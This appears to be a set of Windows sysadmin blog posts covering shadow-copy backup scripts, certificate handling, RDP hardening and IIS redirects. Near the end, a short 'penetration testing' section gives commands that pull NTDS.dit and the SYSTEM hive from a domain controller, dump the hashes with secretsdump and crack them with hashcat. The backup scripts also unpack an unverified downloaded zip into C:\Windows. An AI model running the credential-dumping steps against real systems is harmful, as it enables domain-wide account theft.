PowerShell: Scheduled Task to Backup Local Files to remote UNC Path

Set Script Execution Policy on Host
PS H:\> Set-ExecutionPolicy RemoteSigned

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution
policy?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
Create a Windows Scheduled task with this setting
Create a C:\Scripts\File_Copy_Script_V0.15.ps1 file with this content:
<#
.Description File_Copy_Script Version: 0.15

Purpose: this PowerShell Script is to efficiently mirror large batches of files using Emcopy in conjunction with Volume Shadow Services

Current Features:
1. Check for any errors on the Sources or Destinations and generate a report of any extra spaces in UNC
2. Create a snapshot of the source volume using Shadow Copy to capture any locked files
3. Execute robocopy to mirror the source to its corresponding destination with a time stamp variance allowance of 2 seconds for speed and resiliency
4. Sample the copied files to 'spot check' any time stamp variances
5. Execute in the context of an Administrator

Features planned for development:
6. Enable Volume Shadow Copy (VSS) at Source machines if it has been disabled, and reverse the action when done with copying
7. Trigger Remote Powershell to launch execution from a middle server (a "jump box" that is not a source nor destination)
if the provided Source is detected as a Universal Naming Convention (UNC) path instead of a local file system (LFS) path

Limitations:
1. This iteration requires that script is triggered from a local Windows machine with Internet access (no proxies)
2. Source must be LFS and Destination could either be LFS or UNC
#>

# Specify Source and Destination
$source="D:\Test" # Must be a LFS path
$destination="\\FILESHERVER01\Test"
$block="$source $destination"

# Emcopy switches
$switches="/o /secforce /de /sd /c /r:0 /th 32 /s /purge /sdd"
<# Switch explanations
/s copies sub directories
/purge removes files and directories from the destination that do not exist in the source.
/sdd forces the target directories dates to be synchronized with the source directory.
/de Compares both file size and last modification time when deciding to update a file, updates it if either have been changed.
/cm md5 - checks the file content after copying using and md5 comparison of the source and destination.
/o copies the files owner, without this the account used for the copy will be the owner
/secforce overwrites the destination security settings with the source security settings (copies security settings)
/sd preserves security, the file isn't copied if an error occurs during security settings.
/th 32 - Uses 32 threads, default is 64
/r:0 retries zero times
/w:0 is the wait time in seconds between retries
/c will allow the process to continue after the retries
/log:filename option allows to redirect the console messages to a new file.
/log+:filename option appends the new messages to an existing file.
#>

# Initialize log files
$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\emcopy_logs"
$logFile="$logPath\emcopy-log-$dateStamp.txt"
$log=" /LOG+:$logFile"
$lockedFilesReport="$logPath\_locked-files-log-$dateStamp.txt"
$pathErrorsLog="$logPath`\_path-errors-log-$dateStamp.txt"

# Init other variables
$sampleSize=1000;
$GLOBAL:shadowMount="C:\shadowcopy"

################################## Excuting Program as an Administrator ####################################
# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "White"
clear-host
}
else
{
# We are not running "as Administrator" - so relaunch as administrator

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

Write-Host -NoNewLine "Running as Administrator..."
################################## Excuting Program as an Administrator ####################################

################################## Commence Programming Sequence ####################################
New-Item -ItemType Directory -Force -Path $logpath;
"Executing copying tasks..."

function createShadow(){
[cmdletbinding()]
param(
[string]$targetVolume="C:\"
)
if (!($targetVolume -like "*\")){$targetVolume+="\"}
$shadowCopyClass=[WMICLASS]"root\cimv2:win32_shadowcopy"
$thisSnapshot = $shadowCopyClass.Create($targetVolume, "ClientAccessible")
$thisShadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $thisSnapshot.ShadowID }
$thisShadowPath = $thisShadow.DeviceObject + "\"
C:
cmd /c mklink /d $shadowMount $thisShadowPath
"Shadow of $targetVolume has been made and it's accessible at this local file system (LFS): $shadowMount."
#copyLockedFiles; # this function is to be developed: retrieve lock files list, copy each item on list
#deleteShadow $thisShadow $thisShadowMount

# Export variables
$GLOBAL:shadow=$thisShadow;
}

function deleteShadow(){
# Remove symlink
(Get-Item $shadowMount).Delete()

# delete single instance of volume snapshots
$shadow.Delete()

# Delete all instances of volume snapshots
#Get-WmiObject Win32_ShadowCopy | % {$_.delete()}

"Shadow link $shadowMount has been removed."
}

function logPathError($pathError){
Add-Content $pathErrorsLog "$pathError";
}

function validateDirectory($dirToValidate){
if(Test-Path -Path $dirToValidate){return $True}
else{return $False;}
}

function createDirectory($dir){
# Create folder if it doesn't exist
if(!(validateDirectory $dir)){
New-Item -path $dir -type directory
}
}

function validateSourceAndDestination($thisblock){
$spacesCount=($thisblock.Split(' ')).Count-1
if ($spacesCount -eq 1){
$GLOBAL:source,$GLOBAL:destination=$thisblock.split(' ');
$sourceTest=validateDirectory $source
$destinationTest=validateDirectory $destination
if ($sourceTest -and $destinationTest){
return $True;
}
else {
if (!($sourceTest)){
logPathError "Source: $source";
return $False;
}
if (!($destinationTest)){
$createDestinationPath=(Read-Host -Prompt "Destination: $destination does not exist.`nType 'y' or 'yes' to create.");
if ($createDestinationPath -like 'yes' -or $createDestinationPath -like 'y'){
createDirectory $destination;
return $True;
}
else{
logPathError "Destination: $destination";
return $False
}
}
return $False;
}
}
else {
logPathError $thisblock;
return $False;
}
}

function translateSource{
param(
[string]$uncPath
)
$uri = new-object System.Uri($uncPath)
$thisLocalPath=$uri.LocalPath
#$thisHost=$uri.Host
$GLOBAL:sourceVolume="$((Get-Item $thisLocalPath).PSDrive.Name)`:"
$GLOBAL:translatedSource=$thisLocalPath -replace "$sourceVolume", $shadowMount
}

function sampleTimeStamp{
#$sourceFiles=Get-ChildItem $source -recurse | ? { !($_.PsIsContainer -and $_.FullName -notmatch 'archive') } | get-random -count $sampleSize | % {$_.FullName}
$commonDenominatingPaths=$sourceFiles | %{$_.replace($source,'')}
$destinationFiles=$commonDenominatingPaths | %{"$destination"+"$_";}
$badStamps=0;

"Checking a sample of $sampleSize for any time stamp inaccuracy..."

for ($i=0;$i -lt $sourceFiles.length;$i++){
$sourceFile=$sourceFiles[$i];
$destinationFile=$destinationFiles[$i];
$sourceTimeStamp=(gi $sourceFile).LastWriteTime;
$destinationTimeStamp=(gi $destinationFile).LastWriteTime;
if ($sourceTimeStamp -eq $destinationTimeStamp){
#$output+="`r`n$destinationFile is GOOD";
}
else {
$output+="`r`n$destinationFile is BAD";
$badStamps++;
}
}
$output="`r`n`r`n------------$((($sourceFiles.Length-$badStamps)/$sourceFiles.Length).tostring('P')) of the files in a sample of $($sourceFiles.Length) are having accurate time stamps--------------`n"+$output;
Add-Content $logFile $output;
}

function checkDiskFree{
<#
Excerpt from http://technet.microsoft.com/en-us/library/ee692290(WS.10).aspx:

"For volumes less than 500 megabytes, the minimum is 50 megabytes of free space.
For volumes more than 500 megabytes, the minimum is 320 megabytes of free space.
It is recommended that least 1 gigabyte of free disk space on each volume if the volume size is more than 1 gigabyte."

#>

# Import variables
$thisNode="localhost"
$thisVolume=$sourceVolume

# Obtain disk information
$diskObject = Get-WmiObject Win32_LogicalDisk -ComputerName $thisNode -Filter "DeviceID='$thisVolume'"
$diskFree=[Math]::Round($diskObject.FreeSpace / 1MB)
$diskSize=[Math]::Round($diskObject.Size / 1MB)

switch ($diskSize){
{$diskSize -ge 1024} {if ($diskFree -gt 1024){$feasible=$True;}else{$feasible=$False;};;break;}
{$diskSize -ge 500} {if ($diskFree -gt 320){$feasible=$True;}else{$feasible=$False;};;break;}
{$diskSize -lt 500} {if ($diskFree -gt 50){$feasible=$True;}else{$feasible=$False;};break;}
}

return $feasible
}

function expandZipfile($file, $destination){
$shell = new-object -com shell.application
$zip = $shell.NameSpace($file)

foreach($item in $zip.items()){
$shell.Namespace($destination).copyhere($item)
}
}

function installEmcopy{
$emcopyIsInstalled=(Get-Command emcopy.exe -ErrorAction SilentlyContinue) # Deterministic check on whether emcopy is already available on this system
if (!($emcopyIsInstalled)){
$tempDir="C:\Temp";
$extractionDir="C:\Windows"
$source = "https://kimconnect.com/wp-content/uploads/2019/08/emcopy.zip";
$destinationFile = "$tempDir\emcopy.zip";
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path $tempDir
New-Item -ItemType Directory -Force -Path $extractionDir
$webclient = New-Object System.Net.WebClient;
$WebClient.DownloadFile($source,$destinationFile);
expandZipfile $destinationFile -Destination $extractionDir
}else{
"EMCOPY is currently available in this system.`n";
}
}

function startEmcopy{
param(
[string]$sourceAndDestination
)

Add-Content $logFile "`n`n`n---------------------------------Job Started: $dateStamp---------------------------------";
$totalTime=0;
"Emcopy has started..."
$stopWatch= [System.Diagnostics.Stopwatch]::StartNew()
try{
invoke-expression "emcopy.exe $sourceAndDestination $switches $log";
}
catch{
# Record any errors into log and continue to next item
continue;
}
$elapsedSeconds=$stopWatch.Elapsed.TotalSeconds;
$elapsedDisplay=([timespan]::fromseconds($elapsedSeconds)).ToString().Split('.')[0]
$totalTime+=$elapsedSeconds;
"`r`nEmcopy process is finished. Log is generated here: $log"
$timeDisplay = ([timespan]::fromseconds($totalTime)).ToString()
Add-Content $logFile "`r`n------------------------------Total Time Elapsed: $timeDisplay------------------------------";
}

Function proceed{
"Powershell version detected: $($PSVersionTable.PSVersion.Major)`.$($PSVersionTable.PSVersion.Minor)"
if (validateSourceAndDestination $block){
translateSource $source;
#"Shadow Copy source: $tranlatedSource`nDestination: $destination";
$translatedBlock="$translatedSource $destination";
if (checkDiskFree){
createShadow $sourceVolume;
installEmcopy;
startEmcopy $translatedBlock;
deleteShadow;
sampleTimeStamp;
"Program is completed."
"Log for this activity has been generated at $logFile"
}else{"Not enough disk space to create a VSS snapshot.`r`Program is aborted."}
}
}

proceed;
################################## Main Programming Sequence ####################################

# cmd /c pause | out-null;

PowerShell: Use EMCOPY to Mirror a Directory

# Purpose: this PowerShell snippet is to demonstrate the use of Emcopy

$source="C:\Users\tester\Desktop\Clients"
$destination="C:\Users\tester\Desktop\Test"
#$switches="/o /secforce /s /de /sd /c /r:0 /th 32 /cm md5 /purge /sdd"
$switches="/o /secforce /de /sd /c /r:0 /th 32 /s /purge /sdd"
<# Switch explanations
/s copies sub directories
/purge removes files and directories from the destination that do not exist in the source.
/sdd forces the target directories dates to be synchronized with the source directory.
/de Compares both file size and last modification time when deciding to update a file, updates it if either have been changed.
/cm md5 - checks the file content after copying using and md5 comparison of the source and destination.
/o copies the files owner, without this the account used for the copy will be the owner
/secforce overwrites the destination security settings with the source security settings (copies security settings)
/sd preserves security, the file isn't copied if an error occurs during security settings.
/th 32 - Uses 32 threads, default is 64
/r:0 retries zero times
/w:0 is the wait time in seconds between retries
/c will allow the process to continue after the retries
/log:filename option allows to redirect the console messages to a new file.
/log+:filename option appends the new messages to an existing file.
#>

$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\emcopy_logs"
$logFile="$logPath\robocopy-log-$dateStamp.txt"
$log=" /LOG+:$logFile"


# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
}
else
{
"Relaunching as an Administrator.";

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

# Run your code that needs to be elevated here
Write-Host -NoNewLine "Running as Administrator..."
#$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

function installEmcopy{
$emcopyIsInstalled=(Get-Command emcopy.exe -ErrorAction SilentlyContinue) # Deterministic check on whether emcopy is already available on this system
if (!($emcopyIsInstalled)){
$tempDir="C:\Temp";
$extractionDir="C:\Windows"
$source = "https://kimconnect.com/wp-content/uploads/2019/08/emcopy.zip";
$destinationFile = "$tempDir\emcopy.zip";
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path $tempDir
New-Item -ItemType Directory -Force -Path $extractionDir
$webclient = New-Object System.Net.WebClient;
$WebClient.DownloadFile($source,$destinationFile);
Expand-Archive -LiteralPath $destinationFile -DestinationPath $extractionDir
}else{
"EMCOPY is currently available in this system.`n";
}
}

function startEmcopy{
New-Item -ItemType Directory -Force -Path $logPath;
"Confirm this statement:`nemcopy64.exe $source $destination $switches $log";
pause;
invoke-expression "emcopy64.exe $source $destination $switches $log"
"emcopy process is finished. Log is generated here: $log"
pause;
}

installEmcopy;
startEmcopy;

PowerShell: File Copying Script Version 0.14

<#
.Description: File_Copy_Script Version: 0.14

Purpose: this PowerShell Script is to efficiently mirror large batches of files using Robocopy in conjunction with Volume Shadow Services

Current Features:
1. Check for any errors on the Sources or Destinations and generate a report of any extra spaces in UNC
2. Create a snapshot of the source volume using Shadow Copy to capture any locked files
3. Execute robocopy to mirror the source to its corresponding destination with a time stamp variance allowance of 2 seconds for speed and resiliency
4. Sample the copied files to 'spot check' any time stamp variances

Features planned for development:
5. Execute in the context of a Domain Administrator
6. Enable Volume Shadow Copy (VSS) at Source machines if it has been disabled, and reverse the action when done with copying
7. Trigger Remote Powershell to launch execution from a middle server (a "jump box" that is not a source nor destination)
if the provided Source is detected as a Universal Naming Convention (UNC) path instead of a local file system (LFS) path

Limitations:
- Require robocopy version XP016 or higher
- Only works if the source is LFS and destination is UNC
#>


$source="C:\Users\yamama\Desktop\test" # LFS path, only
$destination="\\FILESHERVER01\test" # UNC path, only
$block="$source $destination"

$switches="/MIR /SEC /DCOPY:T /R:0 /W:0 /XO /FFT /TBD /NP "
$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\robocopy_logs"
$logFile="$logPath\robocopy-log-$dateStamp.txt"
$log="/LOG+:$logFile"
$lockedFilesReport="$logPath\_locked-files-log-$dateStamp.txt"
$pathErrorsLog="$logPath`\_path-errors-log-$dateStamp.txt"
$sampleSize=1000;
$GLOBAL:shadowMount="C:\shadowcopy"

# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
}
else
{
# We are not running "as Administrator" - so relaunch as administrator

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

# Run your code that needs to be elevated here
Write-Host -NoNewLine "Now Running as Administrator..."
#$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

New-Item -ItemType Directory -Force -Path $logpath;
"Executing copying tasks..."

function createShadow(){
[cmdletbinding()]
param(
[string]$targetVolume="C:\"
)
if (!($targetVolume -like "*\")){$targetVolume+="\"}
$shadowCopyClass=[WMICLASS]"root\cimv2:win32_shadowcopy"
$thisSnapshot = $shadowCopyClass.Create($targetVolume, "ClientAccessible")
$thisShadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $thisSnapshot.ShadowID }
$thisShadowPath = $thisShadow.DeviceObject + "\"
cmd /c mklink /d $shadowMount $thisShadowPath
"Shadow of $targetVolume has been made and it's accessible at this local file system (LFS): $shadowMount."
#copyLockedFiles; # this function is to be developed: retrieve lock files list, copy each item on list
#deleteShadow $thisShadow $thisShadowMount

# Export variables
$GLOBAL:shadow=$thisShadow;
}

function deleteShadow(){
# Remove symlink
(Get-Item $shadowMount).Delete()

# delete single instance of volume snapshots
$shadow.Delete()

# Delete all instances of volume snapshots
#Get-WmiObject Win32_ShadowCopy | % {$_.delete()}

"Shadow link $shadowMount has been removed."
}

function logPathError($pathError){
Add-Content $pathErrorsLog "$pathError";
}

function validateDirectory($dirToValidate){
if(Test-Path -Path $dirToValidate){return $True}
else{return $False;}
}

function createDirectory($dir){
# Create folder if it doesn't exist
if(!(validateDirectory $dir)){
New-Item -path $dir -type directory
}
}

function validateSourceAndDestination($thisblock){
$spacesCount=($thisblock.Split(' ')).Count-1
if ($spacesCount -eq 1){
$GLOBAL:source,$GLOBAL:destination=$thisblock.split(' ');
$sourceTest=validateDirectory $source
$destinationTest=validateDirectory $destination
if ($sourceTest -and $destinationTest){
return $True;
}
else {
if (!($sourceTest)){
logPathError "Source: $source";
return $False;
}
if (!($destinationTest)){
$createDestinationPath=(Read-Host -Prompt "Destination: $destination does not exist.`nType 'y' or 'yes' to create.");
if ($createDestinationPath -like 'yes' -or $createDestinationPath -like 'y'){
createDirectory $destination;
return $True;
}
else{
logPathError "Destination: $destination";
return $False
}
}
return $False;
}
}
else {
logPathError $thisblock;
return $False;
}
}

function translateSource{
param(
[string]$uncPath
)
$uri = new-object System.Uri($uncPath)
$thisLocalPath=$uri.LocalPath
#$thisHost=$uri.Host
$GLOBAL:sourceVolume="$((Get-Item $thisLocalPath).PSDrive.Name)`:"
$GLOBAL:translatedSource=$thisLocalPath -replace "$sourceVolume", $shadowMount
}

function reportLockedFiles($unc){
$files=Get-ChildItem -Path $unc -Recurse | where { ! $_.PSIsContainer }| % {$_.FullName}
#$x=$files[0]
#simulateLockedFile "$x"
$lockedFiles=$files | % { if(isFileLocked $_){$_; } }
if ($lockedFiles){
createDirectory $logPath;
Add-Content $lockedFilesReport $lockedFiles;
}
#$lockedFile.Close();
}

function startRobocopy{
param(
[string]$sourceAndDestination
)
Add-Content $logFile "`n`n`n---------------------------------Job Started: $dateStamp---------------------------------";
$totalTime=0;
"Robocopy has started..."
$stopWatch= [System.Diagnostics.Stopwatch]::StartNew()
try{
invoke-expression "robocopy $sourceAndDestination $switches $log | Out-Null";
#invoke-expression "robocopy $item $switches $log | Out-Null";
}
catch{
# Record any errors into log and continue to next item
continue;
}
#"Checking locked files in $source..."
#reportLockedFiles $source
$elapsedSeconds=$stopWatch.Elapsed.TotalSeconds;
$elapsedDisplay=([timespan]::fromseconds($elapsedSeconds)).ToString().Split('.')[0]
#Add-Content $logFile "Block Time Elapsed: $elapsedDisplay";
$totalTime+=$elapsedSeconds;
"`r`nRobocopy is done."
$timeDisplay = ([timespan]::fromseconds($totalTime)).ToString()
#$timeDisplay = $timeString.substring(0, $timeString.lastIndexOf("."));
Add-Content $logFile "`r`n------------------------------Total Time Elapsed: $timeDisplay------------------------------";
}

function sampleTimeStamp{
$sourceFiles=Get-ChildItem $source -recurse | ? { !($_.PsIsContainer -and $_.FullName -notmatch 'archive') } | get-random -count $sampleSize | % {$_.FullName}
$commonDenominatingPaths=$sourceFiles | %{$_.replace($source,'')}
$destinationFiles=$commonDenominatingPaths | %{"$destination"+"$_";}
$badStamps=0;

"Checking a sample of $sampleSize for any time stamp inaccuracy..."

for ($i=0;$i -lt $sourceFiles.length;$i++){
$sourceFile=$sourceFiles[$i];
$destinationFile=$destinationFiles[$i];
$sourceTimeStamp=(gi $sourceFile).LastWriteTime;
$destinationTimeStamp=(gi $destinationFile).LastWriteTime;
if ($sourceTimeStamp -eq $destinationTimeStamp){
#$output+="`r`n$destinationFile is GOOD";
}
else {
$output+="`r`n$destinationFile is BAD";
$badStamps++;
}
}
$output="`r`n`r`n------------$((($sourceFiles.Length-$badStamps)/$sourceFiles.Length).tostring('P')) of the files in a sample of $($sourceFiles.Length) are having accurate time stamps--------------`n"+$output;
Add-Content $logFile $output;
}

function checkDiskFree{
<#
Excerpt from http://technet.microsoft.com/en-us/library/ee692290(WS.10).aspx:

"For volumes less than 500 megabytes, the minimum is 50 megabytes of free space.
For volumes more than 500 megabytes, the minimum is 320 megabytes of free space.
It is recommended that least 1 gigabyte of free disk space on each volume if the volume size is more than 1 gigabyte."

#>

# Import variables
$thisNode="localhost"
$thisVolume=$sourceVolume

# Obtain disk information
$diskObject = Get-WmiObject Win32_LogicalDisk -ComputerName $thisNode -Filter "DeviceID='$thisVolume'"
$diskFree=[Math]::Round($diskObject.FreeSpace / 1MB)
$diskSize=[Math]::Round($diskObject.Size / 1MB)

switch ($diskSize){
{$diskSize -ge 1024} {if ($diskFree -gt 1024){$feasible=$True;}else{$feasible=$False;};;break;}
{$diskSize -ge 500} {if ($diskFree -gt 320){$feasible=$True;}else{$feasible=$False;};;break;}
{$diskSize -lt 500} {if ($diskFree -gt 50){$feasible=$True;}else{$feasible=$False;};break;}
}

return $feasible
}

Function proceed{
if (validateSourceAndDestination $block){
translateSource $source;
#"Shadow Copy source: $tranlatedSource`nDestination: $destination";
$translatedBlock="$translatedSource $destination";
if (checkDiskFree){
createShadow $sourceVolume;
startRobocopy $translatedBlock;
deleteShadow;
sampleTimeStamp;
"Program is completed."
"Log for this activity has been generated at $logFile"
}else{"Not enough disk space to create a VSS snapshot.`r`Program is aborted."}
}
}

proceed;
pause;

Securing Windows Remote Desktop Services

secpol.msc > Local Policies > User Rights Assignments > double-click “Allow Log on through Remote Desktop Services” > remove Administrators and Remote Desktop Users > Add a customized group and/or users

gpedit.msc > Computer Configuration > Adminstrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session host > security > change these settings:
– Set client encryption level = High
– Require secure RPC communication = Enabled
– Require use of specific security layer for remote (RDP) connections = SSL
– Require user authentication for remote connections by using Network Level Authentication = Enabled

PowerShell: Convert Between Various SSL Certificate Formats

# Install Choco (look for instructions in this blog)

# Install openssl.light
choco install openssl.light -y
cd "C:\Program Files\OpenSSL\bin"

# Convert PEM to DER
openssl x509 -outform der -in certificate.pem -out certificate.der

# Convert PEM to P7B
openssl crl2pkcs7 -nocrl -certfile certificate.cer -out certificate.p7b -certfile CACert.cer

# Convert PEM to PFX
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile CACert.crt

# Convert DER to PEM
openssl x509 -inform der -in certificate.cer -out certificate.pem

# Convert P7B to PEM
openssl pkcs7 -print_certs -in certificate.p7b -out certificate.cer

# Convert P7B to PFX
openssl pkcs7 -print_certs -in certificate.p7b -out certificate.cer
# OR
openssl pkcs12 -export -in certificate.cer -inkey privateKey.key -out certificate.pfx -certfile CACert.cer

# Convert PFX to PEM
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes

# Example:
PS C:\Program Files\OpenSSL\bin> .\openssl pkcs12 -in C:\Users\Test\Desktop\star_kimconnect_com.pfx -out C:\Users\Test\Desktop\star_kimconnect_com.cer -nodes
Enter Import Password:
# Done

Renew or Replace a SSL Certificate in Dynamics CRM

Error Message:
“Exchange Online Security Certificate Expiration Please update your certificate or Exchange Online integration will stop functioning in $count days.”

Resolution (steps):

1. Apply the new cert on the ADFS server
a. Obtain new cert and place it into C:\certs directory
b. Install new cert to local machine certificates store using MMC: Run certlm.msc > Personal > right-click Certificates > All Tasks > Import > Next > Browse > navigate to C:\certs > select the new cert > Open > Next > Next > OK > OK
c. Set cert access permissions: Run certlm.msc > Personal > Certificates > right-click new cert > All Tasks > Manage Private Keys > Add > search and select appropriate service accounts (‘AppPool user account’: READ, ‘ADFS service user account’: FULL) > OK > put a check mark next to appropriate permissions for each account > OK > OK
d. Make a backup of the old cert ***
e. Remove old cert from local machine certificates store using MMC: Run certlm.msc > Personal > Certificates > right-click on the old cert > Delete > Yes ***
f. Set Cert using AD FS Management Console:
– Run %windir%\ADFS\Microsoft.IdentityServer.msc: AD FS > Service > right-click Certificates > Set Service Communications Certificate > select the newly imported Cert > OK
– AD FS > Trust Relationship > Relying Party Trusts > right-click CRM Claims Relying Party > Update from Federation Metadata

2. Apply the new cert on Dynamics CRM Server’s IIS
a. Obtain new cert and place it into C:\certs directory
b. Remove old cert from local machine certificates store using MMC: Run certlm.msc > Personal > Certificates > right-click on the old cert > Delete > Yes
c. Install new cert to local machine certificates store using MMC: Run certlm.msc > Personal > right-click Certificates > All Tasks > Import > Next > Browse > navigate to C:\certs > select the new cert > Open > Next > Next > OK > OK >
d. Set cert access permissions: Run certlm.msc > Personal > Certificates > right-click new cert > All Tasks > Manage Private Keys > Add > search and select appropriate service accounts (‘AppPool user account’: READ, ‘ADFS service user account’: FULL) > OK > put a check mark next to appropriate permissions for each account > OK > OK
e. Apply new cert toward IIS: Run inetmgr.exe > Sites > Microsoft Dynamics CRM > click on Bindings on the right side panel > select https > Edit > click Select > highlight the newly imported cert > OK > OK > Close
f. Reset IIS: run iisreset

3. Apply new cert within CRM using Deployment Manager
a. Run “%PROGRAMFILES%\Microsoft Dynamics CRM\tools\Microsoft.Crm.DeploymentManager.exe” > Configure Claims-Based Authentication > Next > Next > Select > highlight the new Cert > OK > Next > Next > OK
b. Reset IIS: run iisreset

Penetration Testing of Active Directory

Foreword: the following information is intended as educational contents and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions to perform evasive techniques as that is against the moral character of ethical hacking.

1. Grab the NTDS.dit and systemhive from a domain controller

vssadmin create shadow /for=C:
copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Reg SAVE HKLM\SYSTEM C:\systemhive

2. Extract the hashes using impacket (https://github.com/SecureAuthCorp/impacket)

git clone https://github.com/SecureAuthCorp/impacket.git
python setup.py install
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract

3. Decode the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat (https://hashcat.net/wiki)
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username -o ~/pentest/pentest.out — outfile-format=3 ~/pentest/pentest-ntlm-extact.ntds ~/pentest.txt — potfile-path ~/pentest/hashcat.pot
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username — show -o ~/pentest/pentest_1.out — outfile-format=3 ~/pentest/ pentest-ntlm-extact.ntds — potfile-path ~/pentest/pentest.out
  1. Plain PowerShell

Microsoft IIS: How to Forward from HTTP to HTTPS

1. Apply the URL Rewrite module as required:
– https://www.iis.net/downloads/microsoft/url-rewrite
– Extract and install it

2. Run InetMgr.exe > select the target website > double-click on Url Rewrite > click “Add Rule(s)” from the right-side menu > high-light “Blank rule” > OK > give this rule a name (e.g. crm.kimconnect.com HTTP to HTTPs) > Set the Inbound Rule as follows:
– Requested URL = Matches the Pattern
– Using = Regular Expressions
– Pattern = (.*)
– Ignore Case = checked

At Conditions window > set Logical grouping = Match All > click Add
— Condition Input = {HTTPS}
— Check if input string = Matches the Pattern
— Pattern = ^OFF$
— Ignore case = checked

At Action window > make these settings > click Apply when done
– Action type = Redirect
– Action Properties
— Redirect URL = https://{HTTP_HOST}{REQUEST_URI} OR https://{HTTP_HOST}/{R:1}
— Append query string = checked
— Redirect type = Permanent (301)

Double-click SSL Setting > ensure Require SSL is not checked

Right-click the website > Explore > locate web.config (if exists) > ensure that the following content exists within that file

    <system.webServer>
<modules>
<add name="WebApiUrlRewriteModule" type="Microsoft.Crm.Application.Components.Modules.WebApiUrlRewriteModule, Microsoft.Crm.Application.Components.Application, Version=8.0.0.0, Culture=neutral, PublicKeyToken=xxxxxxxxxxxxxxxx" preCondition="managedHandler" />
</modules>
</system.webServer>

If the WebApiUrlRewriteModule is not defined, add this <rewrite> rule:

<configuration>
<system.webServer>
<!-- Added by KimConnect 8/15/19
URL Rewrite to enforce HTTP forwarding to HTTPS
-->
<rewrite>
<rules>
<rule name="HTTPS force" enabled="true" stopProcessing="true">
<match url="(.*)" />
<conditions>
<add input="{HTTPS}" pattern="^OFF$" />
</conditions>
<action type="Redirect" url="https://{HTTP_HOST}{REQUEST_URI}" redirectType="Permanent" />
</rule>
</rules>
</rewrite>
<!-- Added by KimConnect 8/15/19
URL Rewrite to enforce HTTP forwarding to HTTPS
-->
</system.webServer>
</configuration>

